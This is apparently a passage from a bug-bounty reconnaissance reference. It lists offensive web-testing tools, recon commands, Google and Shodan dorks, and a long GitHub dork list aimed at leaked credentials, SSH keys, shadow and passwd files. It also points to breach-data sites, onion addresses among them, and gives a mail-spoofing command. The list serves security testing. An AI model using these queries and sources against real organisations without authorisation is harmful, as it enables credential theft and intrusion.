• xsshunter - The XSS Hunter service - a portable version of XSSHunter.com
• dalfox - DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang
• xsser - Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
• XSpear - Powerfull XSS Scanning and Parameter analysis tool&gem
• weaponised-XSS-payloads - XSS payloads designed to turn alert(1) into P1
• tracy - A tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner.
• ground-control - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.
• xssValidator - This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
• JSShell - An interactive multi-user web JS shell
• bXSS - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
• docem - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids)
• XSS-Radar - XSS Radar is a tool that detects parameters and fuzzes them for cross-site scripting vulnerabilities.
• BruteXSS - BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application.
• findom-xss - A fast DOM based XSS vulnerability scanner with simplicity.
• domdig - DOM XSS scanner for Single Page Applications
• femida - Automated blind-xss search for Burp Suite
• B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF
• domxssscanner - DOMXSS Scanner is an online tool to scan source code for DOM based XSS vulnerabilities
• xsshunter_client - Correlated injection proxy tool for XSS Hunter
• extended-xss-search - A better version of my xssfinder tool - scans for different types of xss on a list of urls.
• xssmap - XSSMap 是一款基于 Python3 开发用于检测 XSS 漏洞的工具
• XSSCon - XSSCon: Simple XSS Scanner tool
• BitBlinder - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities
• XSSOauthPersistence - Maintaining account persistence via XSS and Oauth
• shadow-workers - Shadow Workers is a free and open source C2 and proxy designed for penetration testers to help in the exploitation of XSS and malicious Service Workers (SW)
• rexsser - This is a burp plugin that extracts keywords from response using regexes and test for reflected XSS on the target scope.
• xss-flare - XSS hunter on cloudflare serverless workers.
• Xss-Sql-Fuzz - burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz
• vaya-ciego-nen - Detect, manage and exploit Blind Cross-site scripting (XSS) vulnerabilities.
• dom-based-xss-finder - Chrome extension that finds DOM based XSS vulnerabilities
• XSSTerminal - Develop your own XSS Payload using interactive typing
• xss2png - PNG IDAT chunks XSS payload generator
• XSSwagger - A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacks

XXE Injection

• ground-control - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.
• dtd-finder - List DTDs and generate XXE payloads using those local DTDs.
• docem - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids)
• xxeserv - A mini webserver with FTP support for XXE payloads
• xxexploiter - Tool to help exploit XXE vulnerabilities
• B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF
• XXEinjector - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.
• oxml_xxe - A tool for embedding XXE/XML exploits into different filetypes
• metahttp - A bash script that automates the scanning of a target network for HTTP resources through XXE

SSTI Injection

• tplmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
• SSTImap - Automatic SSTI detection tool with interactive interface

Miscellaneous

Lorem ipsum dolor sit amet

Passwords

• thc-hydra - Hydra is a parallelized login cracker which supports numerous protocols to attack.
• DefaultCreds-cheat-sheet - One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password
• changeme - A default credential scanner.
• BruteX - Automatically brute force all services running on a target.
• patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.

Secrets

• git-secrets - Prevents you from committing secrets and credentials into git repositories
• gitleaks - Scan git repos (or files) for secrets using regex and entropy
• truffleHog - Searches through git repositories for high entropy strings and secrets, digging deep into commit history
• gitGraber - gitGraber: monitor GitHub to search and find sensitive data in real time for different online services
• talisman - By hooking into the pre-push hook provided by Git, Talisman validates the outgoing changeset for things that look suspicious - such as authorization tokens and private keys.
• GitGot - Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
• git-all-secrets - A tool to capture all the git secrets by leveraging multiple open source git searching tools
• github-search - Tools to perform basic search on GitHub.
• git-vuln-finder - Finding potential software vulnerabilities from git commit messages
• commit-stream - #OSINT tool for finding Github repositories by extracting commit logs in real time from the Github event API
• gitrob - Reconnaissance tool for GitHub organizations
• repo-supervisor - Scan your code for security misconfiguration, search for passwords and secrets.
• GitMiner - Tool for advanced mining for content on Github
• shhgit - Ah shhgit! Find GitHub secrets in real time
• detect-secrets - An enterprise friendly way of detecting and preventing secrets in code.
• rusty-hog - A suite of secret scanners built in Rust for performance. Based on TruffleHog
• whispers - Identify hardcoded secrets and dangerous behaviours
• yar - Yar is a tool for plunderin' organizations, users and/or repositories.
• dufflebag - Search exposed EBS volumes for secrets
• secret-bridge - Monitors Github for leaked secrets
• earlybird - EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.
• Trufflehog-Chrome-Extension - Trufflehog-Chrome-Extension
• noseyparker - Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.

Git

• GitTools - A repository with 3 tools for pwn'ing websites with .git repositories available
• gitjacker - Leak git repositories from misconfigured websites
• git-dumper - A tool to dump a git repository from a website
• GitHunter - A tool for searching a Git repository for interesting content
• dvcs-ripper - Rip web accessible (distributed) version control systems: SVN/GIT/HG...
• Gato (Github Attack TOolkit) - GitHub Self-Hosted Runner Enumeration and Attack Tool

Buckets

• S3Scanner - Scan for open AWS S3 buckets and dump the contents
• AWSBucketDump - Security Tool to Look For Interesting Files in S3 Buckets
• CloudScraper - CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.
• s3viewer - Publicly Open Amazon AWS S3 Bucket Viewer
• festin - FestIn - S3 Bucket Weakness Discovery
• s3reverse - The format of various s3 buckets is convert in one format. for bugbounty and security testing.
• mass-s3-bucket-tester - This tests a list of s3 buckets to see if they have dir listings enabled or if they are uploadable
• S3BucketList - Firefox plugin that lists Amazon S3 Buckets found in requests
• dirlstr - Finds Directory Listings or open S3 buckets from a list of URLs
• Burp-AnonymousCloud - Burp extension that performs a passive scan to identify cloud buckets and then test them for publicly accessible vulnerabilities
• kicks3 - S3 bucket finder from html,js and bucket misconfiguration testing tool
• 2tearsinabucket - Enumerate s3 buckets for a specific target.
• s3_objects_check - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files.
• s3tk - A security toolkit for Amazon S3
• CloudBrute - Awesome cloud enumerator
• s3cario - This tool will get the CNAME first if it's a valid Amazon s3 bucket and if it's not, it will try to check if the domain is a bucket name.
• S3Cruze - All-in-one AWS S3 bucket tool for pentesters.

CMS

• wpscan - WPScan is a free, for non-commercial use, black box WordPress security scanner
• WPSpider - A centralized dashboard for running and scheduling WordPress scans powered by wpscan utility.
• wprecon - Wordpress Recon
• CMSmap - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
• joomscan - OWASP Joomla Vulnerability Scanner Project
• pyfiscan - Free web-application vulnerability and version scanner
• aemhacker - Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
• aemscan - Adobe Experience Manager Vulnerability Scanner

JSON Web Token

• jwt_tool - A toolkit for testing, tweaking and cracking JSON Web Tokens
• c-jwt-cracker - JWT brute force cracker written in C
• jwt-heartbreaker - The Burp extension to check JWT (JSON Web Tokens) for using keys from known from public sources
• jwtear - Modular command-line tool to parse, create and manipulate JWT tokens for hackers
• jwt-key-id-injector - Simple python script to check against hypothetical JWT vulnerability.
• jwt-hack - jwt-hack is tool for hacking / security testing to JWT.
• jwt-cracker - Simple HS256 JWT token brute force cracker

postMessage

• postMessage-tracker - A Chrome Extension to track postMessage usage (url, domain and stack) both by logging using CORS and also visually as an extension-icon
• PostMessage_Fuzz_Tool - #BugBounty #BugBounty Tools #WebDeveloper Tool

Subdomain Takeover

• subjack - Subdomain Takeover tool written in Go
• SubOver - A Powerful Subdomain Takeover Tool
• autoSubTakeover - A tool used to check if a CNAME resolves to the scope address. If the CNAME resolves to a non-scope address it might be worth checking out if subdomain takeover is possible.
• NSBrute - Python utility to takeover domains vulnerable to AWS NS Takeover
• can-i-take-over-xyz - "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.
• cnames - take a list of resolved subdomains and output any corresponding CNAMES en masse.
• subHijack - Hijacking forgotten & misconfigured subdomains
• tko-subs - A tool that can help detect and takeover subdomains with dead DNS records
• HostileSubBruteforcer - This app will bruteforce for exisiting subdomains and provide information if the 3rd party host has been properly setup.
• second-order - Second-order subdomain takeover scanner
• takeover - A tool for testing subdomain takeover possibilities at a mass scale.
• dnsReaper - DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

Vulnerability Scanners

• nuclei - Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.
• Sn1per - Automated pentest framework for offensive security experts
• metasploit-framework - Metasploit Framework
• nikto - Nikto web server scanner
• arachni - Web Application Security Scanner Framework
• jaeles - The Swiss Army knife for automated Web Application Testing
• retire.js - scanner detecting the use of JavaScript libraries with known vulnerabilities
• Osmedeus - Fully automated offensive security framework for reconnaissance and vulnerability scanning
• getsploit - Command line utility for searching and downloading exploits
• flan - A pretty sweet vulnerability scanner
• Findsploit - Find exploits in local and online databases instantly
• BlackWidow - A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website.
• backslash-powered-scanner - Finds unknown classes of injection vulnerabilities
• Eagle - Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
• cariddi - Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and more...
• OWASP ZAP - World’s most popular free web security tools and is actively maintained by a dedicated international team of volunteers
• SSTImap - SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

Useful

• anew - A tool for adding new lines to files, skipping duplicates
• gf - A wrapper around grep, to help you grep for things
• uro - declutters url lists for crawling/pentesting
• unfurl - Pull out bits of URLs provided on stdin
• qsreplace - Accept URLs on stdin, replace all query string values with a user-supplied value

Uncategorized

• JSONBee - A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites.
• CyberChef - The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
• -
• bountyplz - Automated security reporting from markdown templates (HackerOne and Bugcrowd are currently the platforms supported)
• PayloadsAllTheThings - A list of useful payloads and bypass for Web Application Security and Pentest/CTF
• bounty-targets-data - This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hackerone/Bugcrowd/Intigriti/etc) that are eligible for reports
• android-security-awesome - A collection of android security related resources
• awesome-mobile-security - An effort to build a single place for all useful android and iOS security related stuff.
• awesome-vulnerable-apps - Awesome Vulnerable Applications
• XFFenum - X-Forwarded-For [403 forbidden] enumeration
• httpx - httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
• csprecon - Discover new target domains using Content Security Policy

Public info gathering

OSINT resources

https://osintframework.com/
https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf
https://start.me/p/DPYPMz/the-ultimate-osint-collection
https://docs.google.com/spreadsheets/d/18rtqh8EG2q1xBo2cLNyhIDuK9jrPGwYr9DI2UncoqJQ
https://cipher387.github.io/

OSINT websites

# Multipurpose
https://shodan.io/
https://censys.io/
https://onyphe.io/
https://app.netlas.io/
https://hunter.how/
https://fofa.so/
https://fullhunt.io/
https://www.zoomeye.org/
https://www.criminalip.io/
https://leakix.net/
https://www.yougetsignal.com/
https://intelx.io/
https://pentest-tools.com/
https://gofindwhois.com/
https://gofindwho.com/

# Track website changes
https://visualping.io/
https://web.archive.org

# Companies info
https://opencorporates.com/companies

# Domain Recon
https://www.robtex.com/
https://centralops.net
https://viewdns.info/
https://phpinfo.me/domain
http://bgp.he.net/
https://bgpview.io/
https://suip.biz/
https://dnsdumpster.com/
https://www.whoxy.com/
http://ipv4info.com/
https://rapiddns.io/
https://myip.ms/
https://www.reversewhois.io/?
https://www.whoxy.com/reverse-whois/
https://reverse-whois.whoisxmlapi.com/api
https://host.io/dashboard
https://completedns.com/dns-history/

# Analytics
https://mmhdan.herokuapp.com/
https://publicwww.com/
https://intelx.io/tools?tab=analytics
https://dnslytics.com/reverse-analytics
https://builtwith.com/

# Mailserver blacklists
http://multirbl.valli.org/

# Verify emails
https://tools.emailhippo.com/

# Dark web exposure
https://immuniweb.com/radar/

# New acquisitions
https://crunchbase.com/

# Public APIs
https://www.postman.com/explore/
https://rapidapi.com/

# APIs Recon
https://serene-agnesi-57a014.netlify.app/

# Exif Data 
https://exif-viewer.com

General / AIO

# https://github.com/OWASP/Amass
# Get ASN
amass intel -org "whatever"
# Reverse whois
amass intel -active -asn NUMBER -whois -d domain.com
# SSL Cert Grabbing
amass enum -active -d example.com -cidr IF.YOU.GOT.THIS/24 -asn NUMBER

# https://github.com/smicallef/spiderfoot
spiderfoot -s domain.com

# https://github.com/j3ssie/Osmedeus
python3 osmedeus.py -t example.com

# https://github.com/thewhiteh4t/FinalRecon
python3 finalrecon.py --full https://example.com

# https://github.com/laramies/theHarvester
theHarvester -d domain.com -b all

# https://github.com/lanmaster53/recon-ng
recon-ng

Whois/Registrant Tools

# https://github.com/jpf/domain-profiler
./profile target.com

# Standard whois tool
whois

# Whoxy api
# https://www.whoxy.com/
# Whoxy clients
# https://github.com/MilindPurswani/whoxyrm
# https://github.com/vysecurity/DomLink

# Registrant's domains related
# https://github.com/harleo/knockknock
knockknock -n "companyORregistrant" -p

# Bulk whois
# https://github.com/melbadry9/WhoEnum

Dorks

https://github.com/cipher387/Dorks-collections-list

Google

Tools

# Google Dorks Cli
# https://github.com/six2dez/dorks_hunter
python3 dorks_hunter.py -d domain.com

# Google Dork builder
http://advangle.com/

Dorks

# Google dorks helper
https://dorks.faisalahmed.me/
# Ip search by dorking
https://0iq.me/gip/

# Code share sites
site:http://ideone.com | site:http://codebeautify.org | site:http://codeshare.io | site:http://codepen.io | site:http://repl.it | site:http://jsfiddle.net "company"
# GitLab/GitHub/Bitbucket
site:github.com | site:gitlab.com | site:bitbucket.org "company"
# Stackoverflow
site:stackoverflow.com "target.com"
# Project management sites
site:http://trello.com | site:*.atlassian.net "company"
# Pastebin-like sites
site:http://justpaste.it | site:http://pastebin.com "company"
# Config files
site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:env | ext:ini
# Database files
site:target.com ext:sql | ext:dbf | ext:mdb
# Backup files
site:target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
# .git folder
inurl:"/.git" target.com -github
# Exposed documents
site:target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
# Other files
site:target.com intitle:index.of | ext:log | ext:php intitle:phpinfo "published by the PHP Group" | inurl:shell | inurl:backdoor | inurl:wso | inurl:cmd | shadow | passwd | boot.ini | inurl:backdoor | inurl:readme | inurl:license | inurl:install | inurl:setup | inurl:config | inurl:"/phpinfo.php" | inurl:".htaccess" | ext:swf
# SQL errors
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
# PHP errors
site:target.com "PHP Parse error" | "PHP Warning" | "PHP Error"
# Login pages
site:target.com inurl:signup | inurl:register | intitle:Signup
# Open redirects
site:target.com inurl:redir | inurl:url | inurl:redirect | inurl:return | inurl:src=http | inurl:r=http
# Apache Struts RCE
site:target.com ext:action | ext:struts | ext:do
# Search in pastebin
site:pastebin.com target.com
# Linkedin employees
site:linkedin.com employees target.com
# Wordpress files
site:target.com inurl:wp-content | inurl:wp-includes
# Subdomains
site:*.target.com
# Sub-subdomains
site:*.*.target.com
#Find S3 Buckets
site:.s3.amazonaws.com | site:http://storage.googleapis.com | site:http://amazonaws.com "target"
# Traefik
intitle:traefik inurl:8080/dashboard "target"
# Jenkins
intitle:"Dashboard [Jenkins]"

# Other 3rd parties sites
https://www.google.com/search?q=site%3Agitter.im%20%7C%20site%3Apapaly.com%20%7C%20site%3Aproductforums.google.com%20%7C%20site%3Acoggle.it%20%7C%20site%3Areplt.it%20%7C%20site%3Aycombinator.com%20%7C%20site%3Alibraries.io%20%7C%20site%3Anpm.runkit.com%20%7C%20site%3Anpmjs.com%20%7C%20site%3Ascribd.com%20%22united%22
# Backup files
https://www.google.com/search?q=site%3Aunited.com%20ext%3Abkf%20%7C%20ext%3Abkp%20%7C%20ext%3Abak%20%7C%20ext%3Aold%20%7C%20ext%3Abackup
# Login pages
https://www.google.com/search?q=site%3Aunited.com%20inurl%3Asignup%20%7C%20inurl%3Aregister%20%7C%20intitle%3ASignup
# Config files
https://www.google.com/search?q=site%3Aunited.com%20ext%3Axml%20%7C%20ext%3Aconf%20%7C%20ext%3Acnf%20%7C%20ext%3Areg%20%7C%20ext%3Ainf%20%7C%20ext%3Ardp%20%7C%20ext%3Acfg%20%7C%20ext%3Atxt%20%7C%20ext%3Aora%20%7C%20ext%3Aenv%20%7C%20ext%3Aini
# .git folder
https://www.google.com/search?q=inurl%3A%5C%22%2F.git%5C%22%20united.com%20-github
# Database files
https://www.google.com/search?q=site%3Aunited.com%20ext%3Asql%20%7C%20ext%3Adbf%20%7C%20ext%3Amdb
# Open redirects
https://www.google.com/search?q=site%3Aunited.com%20inurl%3Aredir%20%7C%20inurl%3Aurl%20%7C%20inurl%3Aredirect%20%7C%20inurl%3Areturn%20%7C%20inurl%3Asrc%3Dhttp%20%7C%20inurl%3Ar%3Dhttp
# Code share sites
https://www.google.com/search?q=site%3Asharecode.io%20%7C%20site%3Acontrolc.com%20%7C%20site%3Acodepad.co%20%7Csite%3Aideone.com%20%7C%20site%3Acodebeautify.org%20%7C%20site%3Ajsdelivr.com%20%7C%20site%3Acodeshare.io%20%7C%20site%3Acodepen.io%20%7C%20site%3Arepl.it%20%7C%20site%3Ajsfiddle.net%20%22united%22
# Pastebin-like sites
https://www.google.com/search?q=site%3Ajustpaste.it%20%7C%20site%3Aheypasteit.com%20%7C%20site%3Apastebin.com%20%22united%22
# Linkedin employees
https://www.google.com/search?q=site%3Alinkedin.com%20employees%20united.com
# Project management sites
https://www.google.com/search?q=site%3Atrello.com%20%7C%20site%3A*.atlassian.net%20%22united%22
# Other files
https://www.google.com/search?q=site%3Aunited.com%20intitle%3Aindex.of%20%7C%20ext%3Alog%20%7C%20ext%3Aphp%20intitle%3Aphpinfo%20%5C%22published%20by%20the%20PHP%20Group%5C%22%20%7C%20inurl%3Ashell%20%7C%20inurl%3Abackdoor%20%7C%20inurl%3Awso%20%7C%20inurl%3Acmd%20%7C%20shadow%20%7C%20passwd%20%7C%20boot.ini%20%7C%20inurl%3Abackdoor%20%7C%20inurl%3Areadme%20%7C%20inurl%3Alicense%20%7C%20inurl%3Ainstall%20%7C%20inurl%3Asetup%20%7C%20inurl%3Aconfig%20%7C%20inurl%3A%5C%22%2Fphpinfo.php%5C%22%20%7C%20inurl%3A%5C%22.htaccess%5C%22%20%7C%20ext%3Aswf
# Sub-subdomains
https://www.google.com/search?q=site%3A*.*.united.com
# Jenkins
https://www.google.com/search?q=intitle%3A%5C%22Dashboard%20%5BJenkins%5D%5C%22%20%22united%22
# Traefik
https://www.google.com/search?q=intitle%3Atraefik%20inurl%3A8080%2Fdashboard%20%22united%22
# Cloud buckets S3/GCP
https://www.google.com/search?q=site%3A.s3.amazonaws.com%20%7C%20site%3Astorage.googleapis.com%20%7C%20site%3Aamazonaws.com%20%22united%22
# SQL errors
https://www.google.com/search?q=site%3Aunited.com%20intext%3A%5C%22sql%20syntax%20near%5C%22%20%7C%20intext%3A%5C%22syntax%20error%20has%20occurred%5C%22%20%7C%20intext%3A%5C%22incorrect%20syntax%20near%5C%22%20%7C%20intext%3A%5C%22unexpected%20end%20of%20SQL%20command%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20mysql_connect()%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20mysql_query()%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20pg_connect()%5C%22
# Exposed documents
https://www.google.com/search?q=site%3Aunited.com%20ext%3Adoc%20%7C%20ext%3Adocx%20%7C%20ext%3Aodt%20%7C%20ext%3Apdf%20%7C%20ext%3Artf%20%7C%20ext%3Asxw%20%7C%20ext%3Apsw%20%7C%20ext%3Appt%20%7C%20ext%3Apptx%20%7C%20ext%3Apps%20%7C%20ext%3Acsv
# Wordpress files
https://www.google.com/search?q=site%3Aunited.com%20inurl%3Awp-content%20%7C%20inurl%3Awp-includes
# Apache Struts RCE
https://www.google.com/search?q=site%3Aunited.com%20ext%3Aaction%20%7C%20ext%3Astruts%20%7C%20ext%3Ado
# GitLab/GitHub/Bitbucket
https://www.google.com/search?q=site%3Agithub.com%20%7C%20site%3Agitlab.com%20%7C%20site%3Abitbucket.org%20%22united%22
# Subdomains
https://www.google.com/search?q=site%3A*.united.com
# Stackoverflow
https://www.google.com/search?q=site%3Astackoverflow.com%20%22united.com%22
# PHP errors
https://www.google.com/search?q=site%3Aunited.com%20%5C%22PHP%20Parse%20error%5C%22%20%7C%20%5C%22PHP%20Warning%5C%22%20%7C%20%5C%22PHP%20Error%5C%22

GitHub

Tools

#https://github.com/obheda12/GitDorker
python3 GitDorker.py -tf ~/Tools/.github_tokens -q united.com -p -ri -d Dorks/medium_dorks.txt

Dorks

".mlab.com password"
"access_key"
"access_token"
"amazonaws"
"api.googlemaps AIza"
"api_key"
"api_secret"
"apidocs"
"apikey"
"apiSecret"
"app_key"
"app_secret"
"appkey"
"appkeysecret"
"application_key"
"appsecret"
"appspot"
"auth"
"auth_token"
"authorizationToken"
"aws_access"
"aws_access_key_id"
"aws_key"
"aws_secret"
"aws_token"
"AWSSecretKey"
"bashrc password"
"bucket_password"
"client_secret"
"cloudfront"
"codecov_token"
"config"
"conn.login"
"connectionstring"
"consumer_key"
"credentials"
"database_password"
"db_password"
"db_username"
"dbpasswd"
"dbpassword"
"dbuser"
"dot-files"
"dotfiles"
"encryption_key"
"fabricApiSecret"
"fb_secret"
"firebase"
"ftp"
"gh_token"
"github_key"
"github_token"
"gitlab"
"gmail_password"
"gmail_username"
"herokuapp"
"internal"
"irc_pass"
"JEKYLL_GITHUB_TOKEN"
"key"
"keyPassword"
"ldap_password"
"ldap_username"
"login"
"mailchimp"
"mailgun"
"master_key"
"mydotfiles"
"mysql"
"node_env"
"npmrc _auth"
"oauth_token"
"pass"
"passwd"
"password"
"passwords"
"pem private"
"preprod"
"private_key"
"prod"
"pwd"
"pwds"
"rds.amazonaws.com password"
"redis_password"
"root_password"
"secret"
"secret.password"
"secret_access_key"
"secret_key"
"secret_token"
"secrets"
"secure"
"security_credentials"
"send.keys"
"send_keys"
"sendkeys"
"SF_USERNAME salesforce"
"sf_username"
"site.com" FIREBASE_API_JSON=
"site.com" vim_settings.xml
"slack_api"
"slack_token"
"sql_password"
"ssh"
"ssh2_auth_password"
"sshpass"
"staging"
"stg"
"storePassword"
"stripe"
"swagger"
"testuser"
"token"
"x-api-key"
"xoxb "
"xoxp"
Jenkins
OTP
oauth
authoriztion
password
pwd
ftp
dotfiles
JDBC
key-keys
send_key-keys
send,key-keys
token
user
login-singin
passkey-passkeys
pass
secret
SecretAccessKey
app_AWS_SECRET_ACCESS_KEY AWS_SECRET_ACCESS_KEY
credentials
config
security_credentials
connectionstring
ssh2_auth_password
DB_PASSWORD
[WFClient] Password= extension:ica
access_key
bucket_password
dbpassword
dbuser
extension:avastlic "support.avast.com"
extension:bat
extension:cfg
extension:env
extension:exs
extension:ini
extension:json api.forecast.io
extension:json googleusercontent client_secret
extension:json mongolab.com
extension:pem
extension:pem private
extension:ppk
extension:ppk private
extension:properties
extension:sh
extension:sls
extension:sql
extension:sql mysql dump
extension:sql mysql dump password
extension:yaml mongolab.com
extension:zsh
filename:.bash_history
filename:.bash_history DOMAIN-NAME
filename:.bash_profile aws
filename:.bashrc mailchimp
filename:.bashrc password
filename:.cshrc
filename:.dockercfg auth
filename:.env DB_USERNAME NOT homestead
filename:.env MAIL_HOST=smtp.gmail.com
filename:.esmtprc password
filename:.ftpconfig
filename:.git-credentials
filename:.history
filename:.htpasswd
filename:.netrc password
filename:.npmrc _auth
filename:.pgpass
filename:.remote-sync.json
filename:.s3cfg
filename:.sh_history
filename:.tugboat NOT _tugboat
filename:_netrc password
filename:apikey
filename:bash
filename:bash_history
filename:bash_profile
filename:bashrc
filename:beanstalkd.yml
filename:CCCam.cfg
filename:composer.json
filename:config
filename:config irc_pass
filename:config.json auths
filename:config.php dbpasswd
filename:configuration.php JConfig password
filename:connections
filename:connections.xml
filename:constants
filename:credentials
filename:credentials aws_access_key_id
filename:cshrc
filename:database
filename:dbeaver-data-sources.xml
filename:deployment-config.json
filename:dhcpd.conf
filename:dockercfg
filename:environment
filename:express.conf
filename:express.conf path:.openshift
filename:filezilla.xml
filename:filezilla.xml Pass
filename:git-credentials
filename:gitconfig
filename:global
filename:history
filename:htpasswd
filename:hub oauth_token
filename:id_dsa
filename:id_rsa
filename:id_rsa or filename:id_dsa
filename:idea14.key
filename:known_hosts
filename:logins.json
filename:makefile
filename:master.key path:config
filename:netrc
filename:npmrc
filename:pass
filename:passwd path:etc
filename:pgpass
filename:prod.exs
filename:prod.exs NOT prod.secret.exs
filename:prod.secret.exs
filename:proftpdpasswd
filename:recentservers.xml
filename:recentservers.xml Pass
filename:robomongo.json
filename:s3cfg
filename:secrets.yml password
filename:server.cfg
filename:server.cfg rcon password
filename:settings
filename:settings.py SECRET_KEY
filename:sftp-config.json
filename:sftp-config.json password
filename:sftp.json path:.vscode
filename:shadow
filename:shadow path:etc
filename:spec
filename:sshd_config
filename:token
filename:tugboat
filename:ventrilo_srv.ini
filename:WebServers.xml
filename:wp-config
filename:wp-config.php
filename:zhrc
HEROKU_API_KEY language:json
HEROKU_API_KEY language:shell
HOMEBREW_GITHUB_API_TOKEN language:shell
jsforce extension:js conn.login
language:yaml -filename:travis
msg nickserv identify filename:config
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "bucket_name"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_BUCKET"
org:Target "S3_ENDPOINT"
org:Target "S3_SECRET_ACCESS_KEY"
password
path:sites databases password
private -language:java
PT_TOKEN language:bash
redis_password
root_password
secret_access_key
SECRET_KEY_BASE=
shodan_api_key language:python
WORDPRESS_DB_PASSWORD=
xoxp OR xoxb OR xoxa
s3.yml
.exs
beanstalkd.yml
deploy.rake
.sls
— — — — — — — — — — — — — — — — — — -BASH — — — — — — — — — —
language:bash password
language:bash pwd
language:bash ftp
language:bash dotfiles
language:bash JDBC
language:bash key-keys
language:bash send_key-keys
language:bash send,key-keys
language:bash token
language:bash user
language:bash login-singin
language:bash passkey-passkeys
language:bash pass
language:bash secret
language:bash credentials
language:bash config
language:bash security_credentials
language:bash connectionstring
language:bash ssh2_auth_password
— — — — — — — — — — — — — — — — — — -PYTHON — — — — — — — — —
language:python password
language:python pwd
language:python ftp
language:python dotfiles
language:python JDBC
language:python key-keys
language:python send_key-keys
language:python send,key-keys
language:python token
language:python user
language:python login-singin
language:python passkey-passkeys
language:python pass
language:python secret
language:python credentials
language:python config
language:python security_credentials
language:python connectionstring
language:python ssh2_auth_password

org:facebookresearch https://
org:facebookresearch http://
org:facebookresearch ldap
org:facebookresearch ftp
org:facebookresearch sftp
org:facebookresearch host:
org:facebookresearch login

Shodan

Dorks

port:"9200" elastic
product:"docker"
product:"kubernetes"
hostname:"target.com"
host:"10.10.10.10"
# Spring boot servers, look for /env or /heapdump
org:YOUR_TAGET http.favicon.hash:116323821 

ASN/CIDR Tools

# Company string name to CIDR
# https://github.com/dhn/spk
spk -json -s "Google"

# Versatile tool with multiple input options and output formats
# https://github.com/projectdiscovery/asnmap
asnmap -i 1.3.3.7 -org GOOGLE -d facebook.com,twitter.com -a AS394161

# https://github.com/nitefood/asn
asn -n 8.8.8.8

# https://github.com/j3ssie/metabigor
echo "company" | metabigor net --org
echo "ASN1111" | metabigor net --asn

# https://github.com/yassineaboukir/Asnlookup
python asnlookup.py -m -o <Organization>

# https://github.com/harleo/asnip
asnip -t domain.com -p

# https://github.com/projectdiscovery/mapcidr
echo 10.10.10.0/24 | mapcidr

# https://github.com/eslam3kl/3klector
python 3klector.py -t company

# https://github.com/SpiderLabs/HostHunter
python3 hosthunter.py targets.txt

# Website (with API)
https://asnlookup.com/

Credentials leaks

# pwndb
# https://github.com/davidtavarez/pwndb
python3 pwndb.py --target asd@asd.com

# Websites
https://link-base.org/index.php
http://xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion/
http://pwndb2am4tzkvold.onion
https://weleakinfo.to/
https://www.dehashed.com/search?query=
https://haveibeenpwned.com
https://breachchecker.com
https://vigilante.pw/
https://leak.sx/
https://intelx.io
https://search.illicit.services/
https://breachdirectory.org/

breachdirectory.org + (hashes.com || md5decrypt.net || crackstation.net)# Nice combination

# Check hashes with this tool
https://github.com/jackrendor/jhf

Email tools

# https://github.com/SimplySecurity/SimplyEmail
./SimplyEmail.py

pip3 install mailspoof
sudo mailspoof -d domain.com

# Test email spoof
https://emkei.cz/

# Find emails in an org
